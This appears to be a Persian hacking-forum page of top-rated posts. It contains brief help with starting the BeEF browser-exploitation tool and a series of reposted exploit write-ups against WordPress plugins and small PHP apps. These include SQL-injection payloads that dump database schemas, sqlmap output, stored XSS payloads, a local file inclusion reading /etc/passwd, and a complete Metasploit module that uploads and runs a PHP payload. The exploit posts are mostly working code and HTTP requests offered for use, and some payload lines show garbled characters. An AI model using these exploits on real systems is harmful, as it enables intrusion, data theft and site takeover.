iran rules jazbe modir
snapphost mahak

پرچمداران

  1. Moeein Seven

    Moeein Seven

     مدیر تیم


    • امتیاز

      329

    • تعداد ارسال ها

      8,759


  2. Rednofozi

    Rednofozi

     مدیر ارشد


    • امتیاز

      262

    • تعداد ارسال ها

      1,343


  3. Black_petya

    Black_petya

     عضو فعال


    • امتیاز

      126

    • تعداد ارسال ها

      169


  4. arman

    arman

     عضو فعال


    • امتیاز

      91

    • تعداد ارسال ها

      35



مطالب محبوب

در حال نمایش مطالب دارای بیشترین امتیاز از زمان سه شنبه, 24 مهر 1397 در همه بخش ها

  1. 5 امتیاز
    Black_petya

    beef

    دوست عزیز ابتدا ابزار beef را اجرا کنید بعد از اجرا کردن خودکار مرورگر باز میشود به ادرس http://localhost:3000/ui/authentication زیر میرود اگر نشد شما خودتان ابزار را اجرا کنید و ادرس http://localhost:3000/ui/authentication در مروگر خود وارد کنید در صفحه لاگین یوزر و پسورد به صورت پیش فرض beef هستش امید وارم مشکلتون حل شده باشد درود سربلند و موفق باشید 💓
  2. 4 امتیاز
    # Exploit Title: Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection # Date: 2018-09-09 # Exploit Author: Ceylan Bozogullarindan # Vendor Homepage: http://modalsurvey.pantherius.com/ # Software Link: https://downloads.wordpress.org/plugin/wp-survey-and-poll.zip # Version: 1.5.7.3 # Tested on: Windows 10 # CVE: N\A # Description # The vulnerability allows an attacker to inject sql commands using a value of a cookie parameter. # PoC # Step 1. When you visit a page which has a poll or survey, a question will be appeared for answering. # Answer that question. # Step 2. When you answer the question, wp_sap will be assigned to a value. Open a cookie manager, # and change it with the payload showed below; ["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"] # It is important that the "OR" statement must be 1=2. Because, application is reflecting the first result # of the query. When you make it 1=1, you should see a question from firt record. # Therefore OR statement must be returned False. # Step 3. Reload the page. Open the source code of the page. Search "sss_params". # You will see the version of DB in value of sss_params parameter. # The Request Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: wp_sap=["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"] Connection: keep-alive Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 # The result from source code of the page <script type='text/javascript'> /* <![CDATA[ */ var sss_params = {"survey_options":"{\"options\":\"[\\\"center\\\",\\\"easeInOutBack\\\",\\\"\\\",\\\"-webkit-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-moz-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-ms-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-o-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);\\\",\\\"rgb(0, 0, 0)\\\",\\\"rgb(93, 93, 93)\\\",\\\"1\\\",\\\"5\\\",\\\"12\\\",\\\"10\\\",\\\"12\\\",500,\\\"Thank you for your feedback!\\\",\\\"0\\\",\\\"0\\\",\\\"0\\\"]\",\"plugin_url\":\"http:\\\/\\\/www.*****.com\\\/wp-content\\\/plugins\\\/wp-survey-and-poll\",\"admin_url\":\"http:\\\/\\\/www.******.com\\\/wp-admin\\\/admin-ajax.php\",\"survey_id\":\"1101225978\",\"style\":\"modal\",\"expired\":\"false\",\"debug\":\"true\",\"questions\":[[\"Are You A First Time Home Buyer?\",\"Yes\",\"No\"],[\>>>>>>"10.1.36-MariaDB-1~trusty\"<<<<<<<]]}"}; /* ]]> */ </script> DB version: "10.1.36-MariaDB-1~trusty"....
  3. 4 امتیاز
    # Exploit Title: WordPress Plugin Jibu Pro 1.7 - Cross-Site Scripting # Google Dork: inurl:"/wp-content/plugins/jibu-pro" # Date: 2018-08-29 # Exploit Author: Renos Nikolaou # Software Link: https://downloads.wordpress.org/plugin/jibu-pro.1.7.zip # Version: 1.7 # Tested on: Kali Linux # CVE: N/A # Description: Jinu Pro is prone to Stored Cross Site Scripting vulnerabilities # because it fails to properly sanitize user-supplied input. # PoC - Stored XSS - Parameter: name # 1) Login as a user who have access to Jibu Pro plugin. # 2) Jibu-Pro --> Create Quiz. # 3) At the Quiz Name type: poc"><script>alert(1)</script> , then fill the remaining fields and click Save. # (The first pop-up will appear. Also keep note of the shortcode, similar to: [Test Number]) # 4) Click Create New Questions, fill the fields and click Save. # 5) Copy the Shortcode [Test Number] into any post or page and visit the it via browser. # Post Request (Step 3): POST /wordpress/wp-content/plugins/jibu-pro/quiz_action.php HTTP/1.1 Host: domain.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://domain.com/wordpress/wp-admin/edit.php?page=jibu-pro%2Fquiz_form.php&action=new Cookie: wordpress_295cdc576d46a74a4105db5d33654g45 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 512 name=poc"><script>alert(1)</script>&description=poc&passedMark=3&no_of_ques=3&content=Congrats&_wpnonce=c2414882de&_wp_http_referer=/wordpress/wp-admin/edit.php?page=jibu-pro/quiz_form.php&action=new&action=new&quiz=&user_ID=1&submit=Save
  4. 4 امتیاز
    Title: Blind SQL injection and multiple reflected XSS vulnerabilities in Wordpress Plugin Arigato Autoresponder and Newsletter v2.5 Author: Larry W. Cashdollar, @_larry0 Date: 2018-08-22 CVE-IDs:[CVE-2018-1002000][CVE-2018-1002001][CVE-2018-1002002][CVE-2018-1002003][CVE-2018-1002004][CVE-2018-1002005][CVE-2018-1002006][CVE-2018-1002007][CVE-2018-1002008][CVE-2018-1002009] Download Site: https://wordpress.org/plugins/bft-autoresponder/ Vendor: Kiboko Labs https://calendarscripts.info/ Vendor Notified: 2018-08-22, Fixed v2.5.1.5 Vendor Contact: @prasunsen wordpress.org Advisory: http://www.vapidlabs.com/advisory.php?v=203 Description: This plugin allows scheduling of automated autoresponder messages and newsletters, and managing a mailing list. You can add/edit/delete and import/export members. There is also a registration form which can be placed in any website or blog. You can schedule unlimited number of email messages. Messages can be sent on defined number of days after user registration, or on a fixed date. Vulnerability: These vulnerabilities require administrative priveledges to exploit. CVE-2018-1002000 There is an exploitable blind SQL injection vulnerability via the del_ids variable by POST request. In line 69 of file controllers/list.php: 65 $wpdb->query("DELETE FROM ".BFT_USERS." WHERE id IN (".$_POST['del_ids'].")"); del_ids is not sanitized properly. Nine Reflected XSS. CVE-2018-1002001 In line 22-23 of controllers/list.php: 22 $url = "admin.php?page=bft_list&offset=".$_GET['offset']."&ob=".$_GET['ob']; 23 echo "<meta http-equiv='refresh' content='0;url=$url' />"; CVE-2018-1002002 bft_list.html.php:28: <div><label><?php _e('Filter by email', 'broadfast')?>:</label> <input type="text" name="filter_email" value="<?php echo @$_GET['filter_email']?>"></div> CVE-2018-1002003 bft_list.html.php:29: <div><label><?php _e('Filter by name', 'broadfast')?>:</label> <input type="text" name="filter_name" value="<?php echo @$_GET['filter_name']?>"></div> CVE-2018-1002004 bft_list.html.php:42: <input type="text" class="bftDatePicker" name="sdate" id="bftSignupDate" value="<?php echo empty($_GET['sdate']) ? '' : $_GET['sdate']?>"> CVE-2018-1002005 bft_list.html.php:43: <input type="hidden" name="filter_signup_date" value="<?php echo empty($_GET['filter_signup_date']) ? '' : $_GET['filter_signup_date']?>" id="alt_bftSignupDate"></div> CVE-2018-1002006 integration-contact-form.html.php:14: <p><label><?php _e('CSS classes (optional):', 'broadfast')?></label> <input type="text" name="classes" value="<?php echo @$_POST['classes']?>"></p> CVE-2018-1002007 integration-contact-form.html.php:15: <p><label><?php _e('HTML ID (optional):', 'broadfast')?></label> <input type="text" name="html_id" value="<?php echo @$_POST['html_id']?>"></p> CVE-2018-1002008 list-user.html.php:4: <p><a href="admin.php?page=bft_list&ob=<?php echo $_GET['ob']?>&offset=<?php echo $_GET['offset']?>"><?php _e('Back to all subscribers', 'broadfast');?></a></p> CVE-2018-1002009 unsubscribe.html.php:3: <p><input type="text" name="email" value="<?php echo @$_GET['email']?>"></p> Exploit Code: SQL Injection CVE-2018-1002000 $ sqlmap --load-cookies=./cook -r post_data --level 2 --dbms=mysql Where post_data is: POST /wp-admin/admin.php?page=bft_list&ob=email&offset=0 HTTP/1.1 Host: example.com Connection: keep-alive Content-Length: 150 Cache-Control: max-age=0 Origin: http://example.com Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://example.com/wp-admin/admin.php?page=bft_list&ob=email&offset=0 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: wordpress_XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX mass_delete=1&del_ids=*&_wpnonce=aa7aa407db&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dbft_list%26ob%3Demail%26offset%3D0[!http] (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 300 HTTP(s) requests: --- Parameter: #1* ((custom) POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: mass_delete=1&del_ids=(CASE WHEN (6612=6612) THEN SLEEP(5) ELSE 6612 END)&_wpnonce=aa7aa407db&_wp_http_referer=/wp-admin/admin.php?page=bft_list%26ob=email%26offset=0[!http] --- [11:50:08] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 8.0 (jessie) web application technology: Apache 2.4.10 back-end DBMS: MySQL >= 5.0.12 [11:50:08] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.47' [*] shutting down at 11:50:08 CVE-2018-1002001 http://example.com/wp-admin/admin.php?page=bft_list&action=edit&id=12&ob=XSS&offset=XSS
  5. 4 امتیاز
    # Exploit Title: WordPress Plugin Localize My Post 1.0 - Local File Inclusion # Author: Manuel Garcia Cardenas # Date: 2018-09-19 # Software link: https://es.wordpress.org/plugins/localize-my-post/ # CVE: 2018-16299 # DESCRIPTION # This bug was found in the file: /localize-my-post/ajax/include.php # include($_REQUEST['file']); # The parameter "file" it is not sanitized allowing include local files # To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application. # Local File Inclusion POC: GET /wordpress/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
  6. 4 امتیاز
    kaka

    beef

    سلام من ی مشکل دارم هنگام اجرا کردن beef مرورگر فایرفاکس کالی این پیام را میدهد Unable to connect Firefox can’t establish a connection to the server at 127.0.0.1:3000. The site could be temporarily unavailable or too busy. Try again in a few moments. If you are unable to load any pages, check your computer’s network connection. If your computer or network is protected by a firewall or proxy, make sure that Firefox is permitted to access the Web. اما همه مراحلی که گفته را امتحان کردم مشکلی ندارم فقط چرا مرورگر منو به صفحه لاگین نمیکند ؟
  7. 4 امتیاز
    Black_petya

    beef

    روی سیستمتون سرویس apache نصبه ؟‌ اگر از لینوکس استفاده میکنید با دستور : s sudo apt-get install apache && apt-get install apache2 اقدام به دانلود و نصب apache بکنید و با دستور : s start service apache2 && start service apache اقدام به راه اندازی apache بکنید و بعد دوباره ابزار beef را اجرا کنید .
  8. 4 امتیاز
    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::PhpEXE def initialize(info={}) super(update_info(info, 'Name' => "WordPress Responsive Thumbnail Slider Arbitrary File Upload", 'Description' => %q{ This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin v1.0 for WordPress post authentication. }, 'License' => MSF_LICENSE, 'Author' => [ 'Arash Khazaei', # EDB PoC 'Shelby Pace' # Metasploit Module ], 'References' => [ [ 'EDB', '37998' ] ], 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Responsive Thumbnail Slider Plugin v1.0', { } ] ], 'Privileged' => false, 'DisclosureDate' => "Aug 28 2015", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [ true, "Base path for WordPress", '/' ]), OptString.new('WPUSERNAME', [ true, "WordPress Username to authenticate with", 'admin' ]), OptString.new('WPPASSWORD', [ true, "WordPress Password to authenticate with", '' ]) ]) end def check # The version regex found in extract_and_check_version does not work for this plugin's # readme.txt, so we build a custom one. check_code = check_version || check_plugin_path if check_code return check_code else return CheckCode::Safe end end def check_version plugin_uri = normalize_uri(target_uri.path, '/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt') res = send_request_cgi( 'method' => 'GET', 'uri' => plugin_uri ) if res && res.body && res.body =~ /Version:([\d\.]+)/ version = Gem::Version.new($1) if version <= Gem::Version.new('1.0') vprint_status("Plugin version found: #{version}") return CheckCode::Appears end end nil end def check_plugin_path plugin_uri = normalize_uri(target_uri.path, '/wp-content/uploads/wp-responsive-images-thumbnail-slider/') res = send_request_cgi( 'method' => 'GET', 'uri' => plugin_uri ) if res && res.code == 200 vprint_status('Upload folder for wp-responsive-images-thumbnail-slider detected') return CheckCode::Detected end nil end def login auth_cookies = wordpress_login(datastore['WPUSERNAME'], datastore['WPPASSWORD']) return fail_with(Failure::NoAccess, "Unable to log into WordPress") unless auth_cookies store_valid_credential(user: datastore['WPUSERNAME'], private: datastore['WPPASSWORD'], proof: auth_cookies) print_good("Logged into WordPress with #{datastore['WPUSERNAME']}:#{datastore['WPPASSWORD']}") auth_cookies end def upload_payload(cookies) manage_uri = 'wp-admin/admin.php?page=responsive_thumbnail_slider_image_management' file_payload = get_write_exec_payload(:unlink_self => true) file_name = "#{rand_text_alpha(5)}.php" # attempt to access plugins page plugin_res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, manage_uri), 'cookie' => cookies ) unless plugin_res && plugin_res.body.include?("tmpl-uploader-window") fail_with(Failure::NoAccess, "Unable to reach Responsive Thumbnail Slider Plugin Page") end data = Rex::MIME::Message.new data.add_part(file_payload, 'image/jpeg', nil, "form-data; name=\"image_name\"; filename=\"#{file_name}\"") data.add_part(file_name.split('.')[0], nil, nil, "form-data; name=\"imagetitle\"") data.add_part('Save Changes', nil, nil, "form-data; name=\"btnsave\"") post_data = data.to_s # upload the file upload_res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, manage_uri, '&action=addedit'), 'cookie' => cookies, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data ) page = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, manage_uri), 'cookie' => cookies) fail_with(Failure::Unknown, "Unsure of successful upload") unless (upload_res && page && page.body =~ /New\s+image\s+added\s+successfully/) retrieve_file(page, cookies) end def retrieve_file(res, cookies) fname = res.body.scan(/slider\/(.*\.php)/).flatten[0] fail_with(Failure::BadConfig, "Couldn't find file name") if fname.empty? || fname.nil? file_uri = normalize_uri(target_uri.path, "wp-content/uploads/wp-responsive-images-thumbnail-slider/#{fname}") print_good("Successful upload") send_request_cgi( 'uri' => file_uri, 'method' => 'GET', 'cookie' => cookies ) end def exploit unless check == CheckCode::Safe auth_cookies = login upload_payload(auth_cookies) end end end
  9. 4 امتیاز
    # Exploit Title: Simple Chat System 1.0 - 'id' SQL Injection # Dork: N/A # Date: 2018-10-24 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://www.sourcecodester.com/php/11610/simple-chat-system.html # Software Link: https://sourceforge.net/projects/simple-chat-system/files/latest/download # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # http://localhost/[PATH]/user/chatroom.php?id=[SQL] # # [PATH]/user/chatroom.php # 03 <?php # 04 $id=$_REQUEST['id']; # 05 # 06 $chatq=mysqli_query($conn,"select * from chatroom where chatroomid='$id'"); # 07 $chatrow=mysqli_fetch_array($chatq); GET /[PATH]/user/chatroom.php?id=-3%27雷�穑ɏ볯纵듧纹럫庞%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e--+ HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml왩,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=fuobifeugni2gnt2kir6patce6 Connection: keep-alive HTTP/1.1 200 OK Date: Wed, 24 Oct 2018 20:44:14 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
  10. 4 امتیاز
    # Exploit Title: Vishesh Auto Index 3.1 - 'fid' SQL Injection # Dork: N/A # Date: 2018-10-15 # Exploit Author: Ihsan Sencan # Vendor Homepage: http://www.vishesh.cf/ # Software Link: https://sourceforge.net/projects/vishesh-wap-auto-index/files/latest/download # Version: 3.1 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # http://192.168.1.27/[PATH]/file.php?fid=[SQL] -1%20UnioN%20seLECt%20112115%2c112115%2c112115%2c112115%2c112115%2c112115%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c112115%2c112115%2c112115%2c112115%2c112115%2c112115%2d%2d%20Efe GET /[PATH]/file.php?fid=-1%20UnioN%20seLECt%20112115%2c112115%2c112115%2c112115%2c112115%2c112115%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c112115%2c112115%2c112115%2c112115%2c112115%2c112115%2d%2d%20Efe HTTP/1.1 Host: 192.168.1.27 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=nk7b5obkruk2rtd2kbm3gamg42 Connection: keep-alive HTTP/1.1 200 OK Date: Sat, 15 Oct 2018 01:12:23 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 7799 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 # POC: # 2) # http://192.168.1.27/[PATH]/download.php?fid[SQL] -1%20UnioN%20select%20ConcAT((SElecT%20GrouP_ConcAT(schema_nAME%20SEPAratoR%200x3c62723e)%20FRom%20INFORmatION_ScheMA.SchematA))%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2d%2d%20Efe GET /[PATH]/download.php?fid=-1%20UnioN%20select%20ConcAT((SElecT%20GrouP_ConcAT(schema_nAME%20SEPAratoR%200x3c62723e)%20FRom%20INFORmatION_ScheMA.SchematA))%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2d%2d%20Efe HTTP/1.1 Host: 192.168.1.27 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=nk7b5obkruk2rtd2kbm3gamg42 Connection: keep-alive HTTP/1.1 200 OK Date: Sat, 15 Oct 2018 01:18:41 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 835 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
  11. 4 امتیاز
    # Exploit Title: Wordpress Plugin Support Board 1.2.3 - Cross-Site Scripting # Date: 2018-10-16 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://schiocco.com/ # Software Link : https://board.support/ # Software : Support Board - Chat And Help Desk # Version : v1.2.3 # Vulernability Type : Code Injection # Vulenrability : HTML Injection and Stored XSS # CVE : N/A # In the Schiocco "Support Board - Chat And Help Desk" plugin 1.2.3 for WordPress, # a Stored XSS vulnerability has been discovered in file upload areas in the # Chat and Help Desk sections via the msg parameter # in a /wp-admin/admin-ajax.php sb_ajax_add_message action. # HTTP POST Request : [Stored XSS] POST /wp-admin/admin-ajax.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://TARGET/chat/ Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 450 Cookie: _ga=GA1.2.1452102121.1539634100; _gid=GA1.2.1034601494.1539634100; PHPSESSID=pljbkl7n96fpl5uicnbec21f77 Connection: close action=sb_ajax_add_message&msg=&files=https%3A%2F%2FTARGET%2Fwp-content%2Fuploads%2Fsupportboard%2F70765091%2F%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E.jpg%7C%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E.jpg&time=10%2F15%2F2018%2C+4%3A23%3A42+PM&user_id=70765091&user_img=https%3A%2F%2Fboard.support%2Fwp-content%2Fuploads%2F2017%2F07%2Fuser.jpg&user_name=James+Wilson&user_type=user&environment=wp&sb_lang= # In the v1.2.3 version of the Support Board - Chat And Help Desk PHP & Wordpress Plugin, # the Stored XSS vulnerability has been discovered in the HTML Injection vulnerability and # file upload areas in the Chat and Help Desk sections of Schiocco. # HTTP POST Request : [HTML Injection] POST /wp-admin/admin-ajax.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://TARGET/desk-demo/ Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 288 Cookie: _ga=GA1.2.1452102121.1539634100; _gid=GA1.2.1034601494.1539634100; PHPSESSID=pljbkl7n96fpl5uicnbec21f77 Connection: close action=sb_ajax_add_message&msg=%26%238220%3B%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E&files=&time=10%2F15%2F2018%2C+4%3A19%3A45+PM&user_id=70765091&user_img=https%3A%2F%2Fboard.support%2Fwp-content%2Fuploads%2F2017%2F07%2Fuser.jpg&user_name=James+Wilson&user_type=user&environment=wp&sb_lang=
  12. 4 امتیاز
    # Exploit Title: MySQL Edit Table 1.0 - 'id' SQL Injection # Dork: N/A # Date: 2018-10-18 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://www.bookman.nl # Software Link: https://sourceforge.net/projects/sql-edit-table/files/latest/download # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # http://localhost/[PATH]/example.php?mte_a=edit&id=[SQL] # function edit_rec() { # if (isset ($_GET['id'])) $in_id = $_GET['id']; # if ($_GET['mte_a'] == 'edit') $edit=1; # else $edit = 0; # $count_required = 0; # $rows = ''; # $result = mysqli_query($this->mysqli,"SHOW COLUMNS FROM `$this->table`"); GET /[PATH]/example.php?mte_a=edit&id=-18++UNIon(SEleCT+0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e)--+- HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=0v2bqm10m5rlph8563tiflttl7 DNT: 1 Connection: keep-alive Upgrade-Insecure-Requests: 1 If-Modified-Since: Thu, 18 Oct 2018 14:31:03 GMT HTTP/1.1 200 OK Date: Thu, 18 Oct 2018 14:34:58 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: private Pragma: no-cache Last-Modified: Thu, 18 Oct 2018 14:34:58 GMT Content-Length: 3642 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 # POC: # 2) # http://localhost/[PATH]/example.php?mte_a=del&id=[SQL] # # function del_rec() { # $in_id = $_GET['id']; # if (mysqli_query($this->mysqli,"DELETE FROM $this->table WHERE `$this->primary_key` = '$in_id'")) { # $this->content_deleted = " GET /[PATH]/example.php?mte_a=del&id=%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%31%31%31%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%31%31%3d%31%31%31%2c%31%29%29%29%29%29%2d%2d%20%45%66%65 HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=0v2bqm10m5rlph8563tiflttl7 DNT: 1 Connection: keep-alive Upgrade-Insecure-Requests: 1 If-Modified-Since: Thu, 18 Oct 2018 14:38:14 GMT HTTP/1.1 200 OK Date: Thu, 18 Oct 2018 14:38:18 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: private Pragma: no-cache Last-Modified: Thu, 18 Oct 2018 14:38:18 GMT Content-Length: 1046 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
  13. 4 امتیاز
